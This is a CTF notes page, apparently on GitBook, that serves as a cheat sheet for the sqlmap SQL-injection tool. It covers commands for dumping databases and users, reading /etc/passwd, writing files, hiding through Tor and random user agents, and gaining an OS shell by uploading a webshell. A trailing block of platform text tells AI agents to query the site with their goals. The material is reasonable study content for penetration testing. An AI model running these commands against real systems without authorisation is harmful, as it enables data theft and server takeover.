> For the complete documentation index, see [llms.txt](https://ret2basic.gitbook.io/ctfnote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ret2basic.gitbook.io/ctfnote/web/sql-injection-sqli/sqlmap.md).

# sqlmap

## Verbose Level (-v)

* 0: displays critical info only
* 1: displays warning info
* 2: displays debug info
* **3: displays payload used**
* 4: displays HTTP request body
* 5: displays HTTP response headers
* 6: displays HTTP response body

## Database Connection (-d)

Connect to a database with credential:

```shell
sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>
```

or connect to a database file:

```shell
sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>
```

## GET (-u)

```shell
sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users
```

## POST (--data)

```shell
sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users
```

## Load Request from a File (-r)

```bash
sqlmap -r <request_from_burp>
```

## Cookie (--cookie)

```shell
sqlmap -u <url> --cookie <cookie>
```

## User-Agent (--user-agent)

The default `User-Agent` header sent by sqlmap is `sqlmap/1.0-dev-xxxxxxx`, but we can specify an `User-Agent` header:

```shell
sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users
```

or set a random user agent:

```shell
sqlmap -u <url> --random-agent -f --banner --dbs --users
```

## Level (--level)

* `--level=1`: default mode
* `--level=2`: adds cookie testing
* `--level=3`: adds User-Agent testing
* `--level=4`: more testing
* `--level=5`: adds Host testing

{% hint style="info" %}
Note that the use of the `-p` switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.
{% endhint %}

## Risk (--risk)

* `--risk=1`: (Default) innocuous injections
* `--risk=2`: Enables heavy time-based injections
* `--risk=3`: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table

## Proxy (--proxy) and Tor (--tor)

Proxy:

```shell
sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users
```

Tor:

```shell
sqlmap --tor -u <url> -f --banner --dbs --users
```

## Blind SQLi (--string, --not-string)

* Append to `--string` a string which is always present in `True` output page
* Append to `--not-string` a string which is always present in `False` output page

## Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

```shell
sqlmap -u <url> --is-dba
```

## Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

```shell
sqlmap -u <url> --file-read /etc/passwd
```

Uploads a file:

```shell
sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>
```

## RCE (--os-shell)

The following requirements must be satisfied for `--os-shell` to work:

1. We have write permission
2. Pathnames are default
3. PHP `magic_quotes_gpc` is disabled

```shell
sqlmap -u <url> --os-shell
```

Behind the scene, sqlmap creates an **"upload trojan"** on the target machine and uploads a **webshell** from here.

If the `-d` option is used, sqlmap will use **UDF**. For example:

```bash
sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ret2basic.gitbook.io/ctfnote/web/sql-injection-sqli/sqlmap.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.